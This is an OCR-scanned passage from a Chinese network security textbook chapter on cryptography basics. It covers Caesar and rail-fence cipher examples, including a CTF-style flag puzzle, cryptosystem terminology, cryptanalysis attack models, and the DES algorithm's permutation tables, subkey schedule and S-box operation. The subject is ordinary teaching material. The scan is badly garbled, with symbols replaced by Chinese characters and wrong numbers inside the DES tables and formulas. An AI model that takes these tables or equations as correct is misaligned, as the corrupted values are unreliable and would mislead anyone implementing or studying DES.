【 例 2-15】 解密 困 在 栅栏 中 的 凯撒 c= 二 av\EnZZpZ)ZgbZpo/ai 十 十 x, 求 pi。 

解 : 依 题 意 可 知 密 文 使 用 了 凯撒 密码 和 栅栏 密码 加 密 技术 。 

“首先 进行 栅栏 密码 解密 。 

“a 长度 为 22 二 2X11, 需要 分 2 栏 和 11 栏 两 种 情况 分 别 讨论 。 


vV\EnZZp2Z)Z 
CD z 栏 解 密 时 ,省 文 由 中 心 分 开 为 每 栏 11 个 字符 ,上 下 两 栏 ，[ 0 je 


gbZpo/ai 十 十 x 

先 上 后 下 逐一 合并 得 : agvb\ZEpnoZ/ZapiZ 十 ) 十 Zx。 

然后 进行 凯撒 密码 暴力 破解 : 

Key=1,pi1=bhwe; 

Key 一 2, 思 一 cixd…; 

Key=3,p1=djye™…; 

Key=4,pi1=ekzf*…; 

Key 二 5,pi1 一 flag{_Just_4_fun_0.0_) ,解密 结 束 。 

(2) 11 栏 解密 时 分 析 同 上 ,结果 不 符合 题 意 。 

一 次 置换 和 一 次 替代 的 组 合 称 为 一 轮 加 密 / 解 密 。 一 轮 加 密 后 明文 中 字符 和 字符 的 位 
置 均 发 生 了 变化 ,因而 其 解密 难度 增加 。 所 以 多 轮 加 密 是 增强 密码 系统 保密 性 的 方法 之 一 ， 
解密 运算 量 的 增加 ,导致 需要 引入 计算 机 进行 计算 。 

【 例 2-16】 pi 二 now we are having a test, 分 析 3 轮 加 密 后 的 解密 难度 。 

解 : … 一 次 矩阵 置换 后 为 : wne ow haa regvai n ttxe 

一 次 凯撒 替代 后 为 : zqh rz kdd uhjydl q wwah 

.… 一 轮 解密 强度 : 25X120 一 3000 ,数量 级 : 千 ,一 次 成 功 概 率 : 1/3000。 

二 轮 : 3000 X 3000 一 9 000 000 ,数量 级 : 百 万 ,一 次 成 功 概率 : 1/9 000 000。 
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三 轮 : 9 000 000X600 二 5 400 000 000, 数 量 级 : 十 亿 , 一 次 成 功 概 率 : 1/5 400 000 000。 
综 上 所 述 ,置换 密码 使 用 矩阵 变换 运算 实现 ,具有 位 置 变 , 字 符 不 变 的 特征 。 加 密 、 解 密 
规则 相似 度 非常 高 ,加 密 和 矩阵 和 解密 矩阵 可 以 相互 推出 。 


2.1.3 密码 学 语言 


一 个 密码 系统 (Crypto system) 由 算法 以 及 所 有 可 能 的 明文 、 密 文 和 密 钥 组 成 ,定义 为 
一 个 五 元 组 (P,C,E,D,K), 对 应 的 加 密 方案 称 为 密码 体制 。 

明文 (plain text) 是 密码 系统 可 以 处 理 的 输入 数据 ,用 小 写 p 表示 。 明 文 的 有 限 集合 构 
成 明文 空间 P,pEP。 例 如 P={"this is a book"，"i am a student"}),pi=this is a book， 
p;=iam a student。 

严格 地 讲 ,明文 是 一 串 二 进 制 数 ,代表 字符 串 、 文 本 文件 .图 形 图 像 、 数 字 化 的 语音 流 或 
者 数字 化 的 视频 图 像 。 本 书 中 明文 多 以 字符 串 形式 出 现 , 以 方便 读者 直接 识别 其 明确 含义 。 
实际 的 明文 具有 多 种 形式 ,如 图 2-1(a) 为 图 像 形 式 的 明文 。 

密 文 (cipher text) 是 明文 被 加 密 处 理 后 的 形式 ,特征 是 没有 明确 含义 或 其 含义 具有 二 
义 性 ,用 小 写 c 表示 。 密 文 的 有 限 集合 构成 密 文 空间 C,c EC。 例如 C={"wklv lv d 
errn","xlImw mw e fsso","k co c uvwfgpv","m eq e wxyhirx”} ,c= wklv lv d errn,c,= 
xlmw mw e fsso,cs3=k co c uvwfgpv,cs=m eq e wxyhirx。 图 2-1(b) 为 图 2-1(a) 图 像 对 应 
的 密 文 。 





(a) 明文 (b) 密 文 


图 2-1 图 像 加 密 


将 明文 变换 为 密 文 的 变换 规则 (函数 ) , 称 为 加 密 算法 E(Encrypt) 。 相 应 的 变换 过 程 称 
为 加 密 ,用 数学 公式 表示 为 : c= 二 E(p) ,表示 EE 作用 于 p 得 到 c。 例 如 规定 古典 凯撒 加 密 算 
法 下 ={ 将 当前 字母 用 字母 表 中 其 后 的 第 3 个 字母 替代 ,x、y、z 依次 用 a、b、c 替代 } , 则 加 密 
pi 为 ci 表示 为 : 

ci=wklv lv d errn=E(this is a book)=E(pi) 

将 密 文 恢复 为 明文 的 变换 规则 (函数 ) , 称 之 解密 算法 DC(Deciphering)。 相 应 的 变换 过 
程 称 为 解密 ,用 公式 表示 加 一 D(c) ,表示 D 作用 于 c 产生 p。 例如 规定 古典 凯撒 解密 算法 
DD 二 {将 当前 字母 用 字母 表 中 其 前 的 第 3 个 字母 替代 } , 则 解密 c 为 pi 表示 为 : 

pi=this is a book=D(wklv lv d errn)=D(c) 

加 密 、 解 密 互 为 逆 过 程 ,对 于 有 实用 意义 的 密码 系统 而 言 ,总 是 要 求 它 满足 : D(E(p)) 二 

Zp, 即 用 加 密 算 法 得 到 的 密 文 总 是 能 用 对 应 的 解密 算法 恢复 出 原始 的 明文 。 例 如 : 
D(E(p1))=D(E(this is a book))=D(c)=D(wklv lv d errn)=this is a book= pi 
密 钥 (key) 是 参与 数据 变换 的 参数 ,用 小 写 & 表示 。 一 切 可 能 的 密 钥 构成 的 有 限 集 , 称 
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为 密 钥 空间 K.kE KK。 例 如 古典 凯撒 密码 的 密 钥 空间 K 二 {3},k 二 3。 

综 上 所 述 , 可 定义 古典 凯 撤 密码 系统 为 : 

({"this is a book"，"i am a student"},{"wklv lv d errn","xImw mw e fsso","k coc 
uvwfgpv","m eq e wxyhirx","o gs g yzajktz”),{ 将 当前 字母 用 字母 表 中 其 后 的 第 3 个 字 
母 蔡 代 ,x、y、z 依次 用 a、b、c 替代 ), {将 当前 字母 用 字母 表 中 其 前 的 第 3 个 字母 替代 。a、b、c 
依次 用 x、y、z 替代 },{3)) 

从 数学 的 角度 来 讲 , 一 个 密码 系统 就 是 一 组 映射 , 它 在 密 钥 的 控制 下 将 明文 空间 中 的 每 
一 个 元 素 映射 到 密 文 空间 上 的 某 个 元 素 。 这 组 映射 由 密码 方案 确定 ,具体 使 用 哪 一 个 映射 
由 密 钥 决定 。 图 2-2 示意 了 凯撒 密码 系统 的 映射 关系 。 








wkiv lv d erm 
this is a book xlmw mw e fsso 


k co cuvywfgpv 


iam a student 


m eqe wxyhirx 


0 gs g yzajktz, 





P K={2,3,4,6} C 
图 2-2 凯撒 密码 系统 
定义 字母 和 自然 数 存在 如 表 2-5 所 示 的 一 一 对 应 关系 , 则 凯撒 加 密 算法 可 表示 为 函数 
形式 : c=7(Cp,) 一 (pe) mod 26。 凯 撤 解密 算法 可 表示 为 函数 形式 : c 二 f(p,k) 二 (pp 一 
k) mod 26 。 
表 2-5 字母 数字 对 照 表 
英文 字母 abcdefghijk 1 m n o% Vv w x y z 
数字 01234567891011121314…2122232425 





【 例 2-17】 已 知 c 一 xlmw mw e fsso, 求 pi。 

解 : … 英 文句 子 中 单个 字母 是 a 的 可 能 性 最 大 。 

… 假 定 e 为 a, 为 第 5 个 字母 ,a 为 第 1 个 字母 ,k= 二 e 一 a 二 4 一 0 二 4,k 二 4。 
“pi1=this is a book。 

加 解密 算法 可 分 为 基于 算法 保密 的 算法 和 基于 密 钥 保密 的 算法 两 类 。 

(1) 基于 算法 保密 的 加 解密 算法 。 这 类 算法 的 保密 性 取决 于 保持 算法 的 秘密 ,使 用 范 
围 有 限 ,也 称 为 受 限 制 的 算法 ,多 用 于 安全 性 较 高 的 军事 、 涉 密 部 门 , 不 适合 民用 。 这 种 算法 
不 可 能 进行 质量 控制 或 标准 化 ,大 的 或 经 常 变 换 的 用 户 组 织 不 能 使 用 这 种 算法 ,因为 如 果 有 
一 个 用 户 离开 这 个 组 织 ,其 他 的 用 户 就 必须 更 换 另 外 不 同 的 算法 。 如 果 有 人 无 意 暴露 了 这 
个 秘密 ,所 有 的 人 都 必须 改变 他 们 的 算法 。 

(2) 基于 密 钥 保密 的 加 解密 算法 的 安全 性 都 基于 密 钥 的 安全 性 ,而 不 是 基于 算法 细节 
的 安全 性 。 这 就 意味 着 算法 可 以 公开 ,也 可 以 被 分 析 , 可 以 大 量 生 产 使 用 算法 的 产品 ,即使 
偷窃 者 知道 用 户 的 算法 也 没有 关系 。 如 果 他 不 知道 用 户 使 用 的 具体 密 钥 ,他 就 不 可 能 阅读 
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用 户 的 消息 。 

这 类 算法 是 公开 的 ,因而 广泛 使 用 于 军民 两 用 领域 ,其 对 信息 安全 传输 的 保护 依赖 于 密 
钥 空 间 的 大 小 ,通过 扩大 密码 空间 ,增加 算法 运算 量 等 方法 增加 解密 难度 ,实现 信息 保密 。 

基于 密 钥 保密 的 加 解密 算法 可 进一步 分 为 对 称 密 钥 算法 和 公开 密 钥 算法 两 类 。 前 者 的 
代表 是 DES, 后 者 的 代表 是 RSA。 

密码 学 的 首要 目的 是 隐藏 信息 的 涵义 ,实现 数据 通信 的 机 密 性 。 著 名 的 密码 学 者 Ron 
Rivest 解释 道 :“ 密 码 学 是 关于 如 何在 敌人 存在 的 环境 中 通信 。” 

在 如 图 2-3 所 示 模 型 中 ,还 存在 一 个 密码 攻击 者 或 破译 者 可 从 普通 信道 上 拦截 到 的 密 
文 c, 其 工作 目标 就 是 要 在 不 知道 密 钥 & 的 情况 下 ,试图 从 密 文 c 恢复 出 明文 p 或 密 钥 。 


AF8E70068E29D051 Kl,L dp 


Dolfh.L wdnh 1000 bxdq. 
> oo bd 
Alice ~ 2 Bank 


侧 What is this? 


Trudy 


图 2-3 加 密 AB 模型 


一 个 安全 的 密码 系统 应 该 满足 : 

(1) 非法 截 收 者 很 难 从 密 文 c 中 推断 出 明文 p 。 

(2) 加 密 和 解密 算法 应 该 相当 简便 ,而 且 适 用 于 所 有 密 钥 空间 。 

(3) 密码 系统 的 保密 强度 只 依赖 于 密 钥 。 

(4) 合法 接收 者 能 够 检验 和 证 实 消息 的 完整 性 和 真实 性 。 

(5) 消息 发 送 者 无 法 否认 其 所 发 出 的 消息 ,同时 也 不 能 伪造 别人 的 合法 消息 。 
(6) 必要 时 可 由 仲裁 机 构 进行 公 断 。 


2.1.4 ”凯撒 密码 解密 


密码 学 包括 密码 编码 学 和 密码 分 析 学 。 密 码 体 制 的 设计 是 密码 编码 学 的 主要 内 容 , 密 
码 体 制 的 破译 是 密码 分 析 学 的 主要 内 容 。 密 码 编码 技术 和 密码 分 析 技 术 是 相互 依存 、 相 互 
支持 、 密 不 可 分 的 两 个 方面 。 

密码 编码 学 的 主要 目的 是 保持 明文 (或 密 钥 ,或 明文 和 密 钥 ) 的 秘密 以 防止 偷 听 者 (对 
手 、 攻 击 者 ` 敌 人 ) 知 晓 。 这 里 假设 偷 听 者 完全 能 够 截获 收发 者 之 间 的 通信 。 

密码 分 析 学 是 在 不 知道 密 钥 的 情况 下 ,恢复 出 明文 的 科学 。 成 功 的 密码 分 析 能 恢复 出 
消息 的 明文 或 密 钥 。 密 码 分 析 也 可 以 发 现 密码 体制 的 弱点 ,最 终 得 到 上 述 结 果 ( 密 钥 通过 非 
密码 分 析 方式 的 丢失 叫做 泄露 ) 。 

常用 的 密码 分 析 攻击 有 以 下 几 种 ,当然 ,每 一 类 都 假设 密码 分 析 者 知道 所 用 的 加 密 算法 
的 全 部 知识 : 

(1) 唯 密 文 攻击 (Cipher Text-Only Attack) 。 密 码 分 析 者 有 一 些 消息 的 密 文 ,这 些 消 
息 都 用 同一 加 密 算法 加 密 。 密 码 分 析 者 的 任务 是 恢复 尽 可 能 多 的 明文 ,或 者 最 好 是 能 推算 
出 加 密 消息 的 密 钥 来 ,以 便 采 用 相同 的 密 钥 解密 出 其 他 被 加 密 的 消息 。 
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已 知 : C=Ei(P1) ,C=E,(P:),*… ,C=E,(P;) 

推导 出 : Pe ,P,,…, Pi, 或 者 密 钥 ,或 者 找 出 一 个 算法 从 Ciri=E: (Pi ) 推 出 Pasis 

(2) 已 知 明文 攻击 (Known Plain Text Attack)。 密 码 分 析 者 不 仅 可 得 到 一 些 消 息 的 密 
文 ,而 且 也 知道 这 些 消息 的 明文 。 分 析 者 的 任务 就 是 用 加 密 信 息 推出 用 来 加 密 的 密 钥 或 导 

一 个 算法 ,此 算法 可 以 对 用 同一 密 钥 加 密 的 任何 新 的 消息 进行 解密 。 

已 知 : Pi ,Ci 一 玉 (Pi),P: ,C=E:(P:),*… ,Pi,C;=E:(P;) 

推导 出 : 密 钥 ,或 从 Ci= Ei(Piri) 推 出 PH 的 算法 。 

(3) 选择 明文 攻击 (Chosen Plain Text Attack) 。 分 析 者 不 仅 可 得 到 一 些 消 息 的 密 文 和 
相应 的 明文 ,而 且 可 选择 被 加 密 的 明文 。 这 比 已 知 明文 攻击 更 有 效 。 因 为 密码 分 析 者 能 选 
择 特定 的 明文 块 去 加 密 ,那些 块 可 能 产生 更 多 关于 密 钥 的 信息 ,分 析 者 的 任务 是 推出 用 来 加 
密 消 息 的 密 钥 或 导出 一 个 算法 ,此 算法 可 以 对 用 同一 密 钥 加 密 的 任何 新 消息 进行 解密 。 

已 知 : 

Pi,Ci=E,(P),P;,,C,=E,(P,),.,P;,C;=E,(P;) 
其 中 Pi ,Ps ,…,P; 只 可 由 密码 分 析 者 选择 。 

推导 出 : 密 钥 ,或 从 Ce = Ei(Piri) 推 出 Pa 的 算法 。 

(4) 自 适应 选择 明文 攻击 (Adaptive Chosen Plain Text Attack)。 这 是 选择 明文 攻击 的 
特殊 情况 。 密 码 分 析 者 不 仅 能 选择 被 加 密 的 明文 ,而 且 也 能 基于 以 前 加 密 的 结果 修正 这 个 
选择 。 在 选择 明文 攻击 中 ,密码 分 析 者 可 以 选择 一 大 块 被 加 了 密 的 明文 。 而 在 自 适应 选择 密 
文 攻击 中 ,攻击 者 可 选取 较 小 的 明文 块 ,然后 再 基于 第 一 块 的 结果 选择 另 一 明文 块 ,以 此 类 推 。 

如 果 密 码 分 析 者 可 以 仅 由 密 文 推出 明文 或 密 钥 ,或 者 可 以 由 明文 和 密 文 推出 密 钥 ,那么 
就 称 该 密码 系统 是 可 破译 的 。 相 反 地 , 则 称 该 密码 系统 不 可 破译 。 

衡量 密码 分 析 效 果 的 指标 有 两 个 : 一 是 准确 率 ; 二 是 时 间 效 率 。 

下 面 以 凯撒 密码 为 例 ,进行 密码 分 析 。 

首先 无 密 钥 凯 撤 密 码 是 可 以 破解 的 ,因为 凯撒 密码 只 有 25 种 密 钥 ,所 以 最 直接 的 方法 
就 是 对 这 25 种 可 能 性 逐一 检测 ,这 就 是 我 们 所 说 的 暴力 破解 法 。 具 体 实 例 见 例 2-6。 

(1) 初级 解密 。 初 级 解密 是 指 密 文 用 空格 分 隔 单词 , 且 有 单个 字母 。 此 时 单字 母 是 突 
破 口 ,英文 句子 中 出 现 单字 母 是 a 的 概率 非常 大 ,因此 可 据 此 将 密 文 中 单字 母 假 定 为 a 从 而 
推出 密 钥 实 现 解 密 。 具 体 实例 见 例 2-17。 

因此 实际 使 用 时 ,需要 将 明文 中 的 空格 去 掉 后 加 密生 成 密 文 ,增加 密 文 破解 难度 。 

(2) 中 级 解密 。 中 级 解密 是 指 密 文 允许 出 现 空 格 ,但 没有 单个 字母 ,使 用 暴力 破解 方法 
列 出 所 有 25 种 可 能 ,人 工 识别 正确 结果 。 具 体 实例 见 例 2-6。 

从 多 个 可 能 明文 中 选择 出 正确 明文 的 原则 是 : 统计 明文 中 出 现 单词 个 数 的 多 少 , 以 个 
数 多 的 明文 为 正确 答案 。 理 想 状态 下 ,正确 答案 是 一 个 具有 确定 含义 的 句子 。 

(3) 高 级 解密 。 在 中 级 破解 的 基础 上 ,提高 计算 机 程序 的 智能 化 程度 ,方法 是 加 入 常用 
词 词典 或 完整 词典 ,通过 字符 串 与 词典 中 单词 匹配 的 个 数 , 最 终 选中 正确 的 一 个 结果 或 缩小 
正确 的 结果 为 2 一 3 个 句子 ,减少 人 工 干 预 ,实现 计算 机 智能 选择 正确 结果 。 

例如 增加 常用 词 词典 dict==["a".,"i","to","be","am","we","are","you","the"], 选 
取 可 能 明文 的 前 个 字符 串 与 dict 比较 ， 逐步 缩小 正确 明文 的 范围 

具体 密码 分 析 请 在 实验 1 中 自己 实现 。 


第 2 章 密码 学 基础 43 





2.2 DES 对 称 密 码 


对 称 密 钥 算法 的 特点 是 加 解密 算法 使 用 的 密 钥 相同 (例如 凯撒 密码) 或 加 密 密 钥 能 够 从 
解密 密 钥 中 推算 出 来 , 反 过 来 也 成 立 (例如 矩阵 置换 密码 ) ,所 以 也 叫做 单 密 钥 算法 。 

对 称 密 钥 算法 的 安全 性 依赖 于 密 钥 ,泄露 密 钥 就 意味 着 任何 人 都 能 对 消息 进行 加 解密 。 
为 了 强调 算法 依赖 于 密 钥 , 用 K 作为 下 标 表示 ,这样 加 /解密 函数 就 变 成 : 

Ex(P)=C, Dr(C) 三 P， Dx(Ex(P)) = Ex(De(P))=P 

根据 一 次 能 处 理 数据 的 位 数 , 对 称 算法 可 细 分 为 两 类 : 

(1) 一 次 只 对 明文 中 的 单个 位 (有 时 对 字 节 ) 运 算 的 算法 称 为 序列 算法 或 序列 密码 。 

(2) 对 明文 的 一 组 位 进行 运算 ,这些 位 组 称 为 分 组 ,相应 的 算法 称 为 分 组 算法 或 分 组 密 
码 。 现 代 计 算 机 密码 算法 的 典型 分 组 长 度 为 64 位 一 一 这 个 长 度 既 考 虑 到 分 析 破译 密码 的 
难度 ,又 考虑 到 使 用 的 方便 性 。 后 来 , 随 着 破译 能 力 的 提高 ,分 组 长 度 又 增加 到 128 位 或 
更 长 。 

DES(Data Encryption Standard, 数 据 加 密 标准 ) 算 法 是 在 美国 NSA 资助 下 由 IBM 公 
司 开发 的 一 种 对 称 密码 算法 ,其 初衷 是 为 政府 非 机 密 的 敏感 信息 提供 较 强 的 加 密 保 护 。 它 
是 美国 政府 担保 的 第 一 种 加 密 算法 ,并 在 1977 年 被 正式 作为 美国 联邦 信息 处 理 标 准 

DES 主要 提供 给 非 军事 性 质 的 联邦 政府 机 构 和 私营 部 门 使 用 ,并 迅速 成 为 名 声 最 大 、 
使 用 最 广 的 商用 密码 算法 。 

在 1972 年 和 1974 年 美国 国家 标准 局 两 次 向 公众 发 出 了 征求 加 密 算法 的 公告 。 对 加 密 
算法 提出 了 以 下 几 点 要 求 : 

(1) 提供 高 质量 的 数据 保护 ,防止 数据 未 经 授权 的 泄露 和 未 被 察觉 的 修改 ; 

(2) 具有 相当 高 的 复杂 性 ,使 得 破译 的 开销 超过 可 能 获得 的 利益 ,同时 又 要 便于 理解 和 
掌握 ; 

(3) DES 密码 体制 的 安全 性 应 该 不 依赖 于 算法 的 保密 ,其 安全 性 仅 以 加 密 密 钥 的 保密 
为 基础 ; 

(4) 实现 经 济 ,运行 有 效 , 并 且 适 用 于 多 种 完全 不 同 的 应 

(5) 实现 算法 的 电子 器 件 必须 经 济 .运行 有 效 ， 

(6) 必须 能 够 验证 ,允许 出 口 


2.2.1 DES 算法 


DES 算法 是 一 个 分 组 加 密 算 法 ,典型 的 DES 以 64 位 为 分 组 对 数据 加 密 , 加 密 和 解密 用 
的 是 同一 个 算法 。 它 的 密 钥 长 度 是 56 位 (因为 每 个 字 节 的 第 8 位 都 被 用 作 奇 偶 校 验 以 保证 
密 钥 本 身 正 确 , 不 会 在 密 钥 分 发 过 程 中 出 错 ) , 密 钥 可 以 是 任意 的 56 位 的 数 ,而 且 可 以 在 任 
意 时 候 改 变 。 其 中 有 极 少 数 被 认为 是 易 破 解 的 弱 密 钥 ,但 是 很 容易 避 开 它们 不 用 。 所 以 
DES 算法 保密 性 依赖 于 密 钥 。 

简单 地 说 ,算法 只 不 过 是 加 密 的 两 个 基本 技术 一 一 混乱 和 扩散 的 组 合 。 

DES 组 建 分 组 是 这 些 技术 的 一 个 组 合 ( 先 代替 后 置换 ), 它 基于 密 钥 作用 于 明文 ,这 就 
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是 众所周知 的 轮 (round)。DES 有 16 轮 , 这 意味 着 要 在 明文 分 组 上 实施 16 次 相同 的 组 合 
技术 。 此 算法 只 使 用 了 标准 的 算术 和 逻辑 运算 ,而 其 作用 的 数 也 最 多 只 有 64 位 ,因而 运算 
速度 非常 快 。 

DES 算法 的 入口 参数 有 3 个 : Key、Data、Mode。 其 中 Key 为 8 个 字 节 共 64 位 ,是 
DES 算法 的 工作 密 钥 ; Data 也 为 8 个 字 节 64 位 ,是 要 被 加 密 或 被 解密 的 数据 ; Mode 为 
DES 的 工作 方式 ,有 两 种 : 加 密 或 解密 。 

DES 算法 是 这 样 工作 的 : 如 Mode 为 加 密 , 则 用 Key 把 数据 Data 进行 加 密 , 生 成 Data 
的 密码 形式 (64 位 ) 作 为 DES 的 输出 结果 ; 如 Mode 为 解密 , 则 用 Key 把 密码 形式 的 数据 
Data 解密 ,还 原 为 Data 的 明码 形式 (64 位 ) 作 为 DES 的 输出 结果 。 

在 通信 网 络 的 两 端 ,双方 约定 一 致 的 Key, 在 通信 的 源 点 用 Key 对 核心 数据 进行 DES 
加 密 ,然后 以 密码 形式 在 公共 通信 网 (如 电话 网 ) 中 传输 到 通信 网 络 的 终点 ,数据 到 达 目 的 地 
后 ,用 同样 的 Key 对 密码 数据 进行 解密 , 便 再 现 了 明码 形式 的 核心 数据 。 这 样 , 便 保证 了 核 
心 数据 在 公共 通信 网 中 传输 的 安全 性 和 可 靠 性 。 通 过 定期 在 通信 和 网络 的 源 端 和 目的 端 同 时 
更 换 用 新 的 Key, 便 能 进一步 提高 数据 的 保密 性 ,这 是 现在 金融 交易 网 络 的 流行 做 法 。 

DES 算法 实现 加 密 需要 3 个 步 又 : 

第 一 步 ,变换 明文 。 对 给 定 的 64 位 比特 的 明文 z, 首 先 通过 一 个 置换 表 IP 表 来 重新 排 
列 z, 从 而 构造 出 64 位 比特 的 zo ,zo 二 IP(zx)= 二 LoRo ,其 中 Lo。 表示 zo 的 前 32 比特 ,Ro 表示 
xzo 的 后 32 位 。 

第 二 步 ,按照 规则 迭代。 规则 为 Li 二 Ri-， 

Ri= Li OfR Ki) (i=1,2,3,.,16) 

经 过 第 一 步 变 换 已 经 得 到 L。 和 R。 的 值 ,其 中 符号 田 表示 的 数学 运算 是 异 或 ,f 表示 一 
种 置换 ,由 S 盒 置 换 构成 ,K; 是 一 些 由 密 钥 编 排 函 数 产 生 的 比特 块 。f 入 ; 将 在 后 面 
介绍 。 

第 三 步 , 对 LieRis 利 用 IP-: 作 逆 置 换 , 就 得 到 了 密 文 y。 加 密 过 程 如 图 2-4 所 示 ,f 函数 
的 处 理 流程 如 图 2-5 所 示 。 
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图 2-4 DES 加 密 系统 
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图 2-5 函数 了 的 处 理 流程 


1. DES 加 密 的 4 个 关键 点 

从 图 2-4 中 可 以 看 出 ,DES 加 密 需要 4 个 关键 点 : IP 转换 表 和 IP-: 逆 转换 表 、 函 数 f 
子 密 钥 K, 和 S 盒 的 工作 原理 。 

1) IP 置换 表 和 IP 一 逆 置 换 表 

输入 的 64 位 数据 按 IP 置换 表 进 行 重新 组 合 , 并 把 输出 分 为 Lo、R。 两 部 分 ,每 部 分 各 长 
32 位 ,其 IP 置换 表 如 表 2-6 所 示 。 


表 2-6 IP 置换 表 
58 50 12 34 26 18 10 2 60 52 44 36 28 20 12 4 
62 54 46 38 30 22 14 6 64 56 48 40 32 24 16 8 
57 49 41 33 25 17 入 1 59 51 43 35 27 19 11 3 
61 53 45 37 29 21 13 5 63 55 47 39 31 23 35 7 


将 输入 64 位 比特 的 第 58 位 换 到 第 1 位 ,第 50 位 换 到 第 2 位 ,以 此 类 推 ,最 后 一 位 是 原 
来 的 第 7 位 。L。、R。 则 是 换 位 输出 后 的 两 部 分 ,Lo 是 输出 的 左 32 位 ,Ro 是 右 32 位 。 比 如 : 
置换 前 的 输入 值 为 Di D;D，… D6 , 则 经 过 初始 置换 后 的 结果 为 : Lo 二 Dss Dso.….Ds ,Ro 二 Dsr 
Di...D;。 

经 过 16 次 近代 运算 后 。 得 到 Lis、Ris ,将 此 作为 输入 ,进行 道 置换 , 即 得 到 密 文 输出 。 
逆 置 换 正 好 是 初始 置换 的 道 运算 ,例如 第 1 位 经 过 初始 置换 后 ,处 于 第 40 位 ,而 通过 逆 置 换 
IP-: ,又 将 第 40 位 换 回 到 第 1 位 ,其 逆 置 换 IP-: 规 则 如 表 2-7 所 示 。 

表 2-7 逆 置换 表 IP 
40 8 48 16 56 24 64 32 39 7 47 15 55 23 63 31 





38 6 46 14 54 22 62 30 37 5 45 13 53 21 61 29 
36 4 44 12 52 20 60 28 35 3 43 11 51 19 59 27 


34 2 42 10 50 18 58 26 33 1 41 9 49 17 57 25 


46 网 络 安 全 教程 与 实践 (第 2 版 ) 





2) 函数 f 
函数 f 有 两 个 输入 : 32 位 的 R;_! 和 48 位 的 K;,f 函数 的 处 理 流程 如 图 2-5 所 示 。 
EE 变换 的 算法 是 从 R;-1 的 32 位 中 选取 某 些 位 ,构成 48 位 。 即 下 将 32 比特 扩展 变换 为 
48 位 ,变换 规则 根据 位 选择 表 , 如 表 2-8 所 示 。 
表 2-8 下 位 选择 表 
A 
12 13 12 13 14 15 16 17 1 17 18 19 2 21 20 21 


22 23 24 25 24 25 26 27 28 29 28 29 30 31 32 1 


K; 是 由 密 钥 产生 的 48 位 比特 串 ,具体 的 算法 下 面 介绍 。 将 EE 的 选 位 结果 与 K; 作 异 或 
操作 ,得 到 一 个 48 位 输出 。 分 成 8 组 ,每 组 6 位 ,作为 8 个 S 盒 的 输入 。 
每 个 S 盒 输出 4 位 , 共 32 位 ,S 盒 的 工作 原理 将 在 第 4 步 介 绍 。S 盒 的 输出 作为 尸 变 
换 的 输入 ,P 的 功能 是 对 输入 进行 置换 ,P 换 位 表 如 表 2-9 所 示 。 
表 2-9 P 换 位 表 


3) 子 密 钥 K; 
假设 密 钥 为 天, 长 度 为 64 位 ,但 是 其 中 第 8、16、24、32、40、48、64 用 作 奇 偶 校 验 位 ,实际 


上 密 钥 长 度 为 56 位 。K 的 下 标 i 的 取 值 范围 是 1~16, 用 16 轮 来 构造 。 构 造 过 程 如 图 2-6 
所 示 。 
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图 2-6 子 密 钥 生成 
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首先 ,对 于 给 定 的 密 钥 玉 , 应 用 PC, 变换 进行 选 位 , 选 定 后 的 结果 是 56 位 , 设 其 前 28 
位 为 Co ,后 28 位 为 Du。PC 选 位 如 表 2-10 所 示 。 
表 2-10 PC 选 位 表 
57 49 41 33 25 17 和 1 58 50 42 34 26 18 
10 2 59 51 43 35 27 19 11 3 60 52 44 36 
63 55 47 39 31 23 15 7 62 54 46 38 30 22 
14 6 61 53 45 37 29 21 13 5 28 20 12 4 


第 一 轮 , 对 Co 作 左 移 LS 得 到 Ci ,对 Du 作 左 移 LS 得 到 Di ,对 CD 应 用 PC 进行 
选 位 ,得 到 K, 。 其 中 LS, 是 左 移 的 位 数 ,如 表 2-11 所 示 。 
表 2-11 LS 移 位 表 
1 2 2 2 2 2 2 1 2 2 2 2 2 2 1 
表 2-11 中 的 第 一 列 是 LS ,第 二 列 是 LS; ,以 此 类 推 。 左 移 的 原理 是 所 有 二 进位 向 左 移 
动 , 原 来 最 右边 的 比特 位 移动 到 最 左边 。 其 中 PC* 如 表 2-12 所 示 。 
表 2-12 PC, 选 位 表 


14 17 11 24 1 5 3 28 15 6 21 10 
23 19 12 4 26 8 16 7 27 20 13 2 
41 52 31 37 47 55 30 40 51 45 33 48 
44 49 39 56 34 53 46 42 50 36 29 32 
第 二 轮 : 对 Ci,D, 作 左 移 LS; 得 到 C: 和 D; ,进一步 对 C,D; 应 用 PC 进行 选 位 ,得 到 


K,。 如 此 继续 ,分 别 得 到 Ks 、K,、……: ‘Kies 

4) S 盒 的 工作 原理 

S 盒 以 6 位 作为 输入 ,而 以 4 位 作为 输出 ,现在 以 Si 为 例 说 明 其 过 程 。 假 设 输入 为 a= 
aiasdsdiasas, 则 azasaias 所 代表 的 数 是 0 一 15 的 一 个 数 , 记 为 :k= 二 asasasas; 由 aias 所 代 
表 的 数 是 0 一 3 的 一 个 数 , 记 为 h 二 aras。 在 Si 的 h 行 .k 列 找到 一 个 数 B,B 在 0~15 之 间 ， 
它 可 以 用 4 位 二 进 制 表示 , 为 B 二 6b.5253b4 ,这 就 是 Si 的 输出 。S 盒 是 由 8 张 数据 表 组 成 (这 
里 不 详细 给 出 )。 

例如 a==110011,h==aias = 二 (11)s 二 (3)w 对 应 于 第 三 行 ,=azasasas 二 (1001)s 二 (9)io 
对 应 于 第 9 列 ,S 盒 的 第 3 行 第 9 列 的 数 是 14( 记 住 行 、 列 的 记 数 从 0 开始 而 不 是 从 1 开 
始 ) , 则 值 5 二 61525;54 二 1110,1110 将 代替 110011。 

2. DES 加 密 具 有 雪 骨 效应 


在 密码 学 中 ,雪崩 效应 (Avalanche effect) 指 当 输 入 发 生 最 微小 的 改变 (如 反 转 一 
进 制 位 ) 时 ,也 会 导致 输出 的 剧变 (如 输出 中 一 半 的 二 进 制 位 发 生 反 转 )。 在 高 品质 的 块 密码 
中 ,无 论 密 钥 或 明文 的 任何 细微 变化 都 应 当 引 起 密 文 的 剧烈 改变 ; 否则 ,如 果 变 化 太 小 ,就 
可 能 找到 一 种 方法 减 小 有 待 搜索 的 明文 和 密 文 的 空间 的 大 小 。 

严格 雪崩 准则 (Strict Avalanche Criterion, SAC) 是 雪崩 效应 的 形式 化 。 它 指出 , 当 任 
何 一 个 输入 位 被 反 转 时 ,输出 中 的 每 一 位 均 有 50% 的 概率 发 生变 化 。 严 格 雪 崩 准 则 建立 于 
密码 学 的 完全 性 概念 上 ,由 Webster 和 Tavares 在 1985 年 提出 。 
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DES 加 密 具 有 雪崩 效 应 : 

(1) 用 同样 密 钥 加 密 只 差 一 位 的 两 个 明文 。 例 如 Key 王 "11111111", pi 二 hellodes，, 
p:=hellodet, 

